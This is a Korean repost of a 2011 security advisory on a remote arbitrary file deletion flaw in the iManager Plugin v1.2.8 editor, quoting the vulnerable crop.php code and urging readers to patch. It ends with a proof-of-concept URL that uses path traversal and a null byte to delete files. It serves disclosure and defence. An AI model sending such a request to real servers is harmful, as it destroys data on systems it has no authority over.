iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability

iManager Plugin v1.2.8 에 대한 리모트 취약점이 발견되었다. (이 에디터는 단독으로 사용될 수 있으며 플러그인으로 tinyMCE, SPAW, htmlAREA, Xinha 그리고 FCKeditor에 사용되고 있을 수 있으니 확인하여 패치하자.)

======================================================================

/scripts/phpCrop/crop.php:

----------------------------------------------------------------------

32: if( isset($_REQUEST['s']) ) {

33:     //delete previous temp files

34:     $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE);

35:     if ( is_array ( $matches ) ) {

36:          foreach ( $matches as $fn) {

37:               @unlink($fn);

38:          }

39: }

======================================================================

Tested on: Microsoft Windows XP Professional SP3 (EN)

Apache 2.2.14 (Win32)

PHP 5.3.1

MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm gmail com

Advisory ID: ZSL-2011-5043

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php

15.09.2011

--

http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00

[출처] http://securityswebblog.blogspot.com/2011/09/imanager-plugin-v128-d-remote-arbitrary.html

 

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.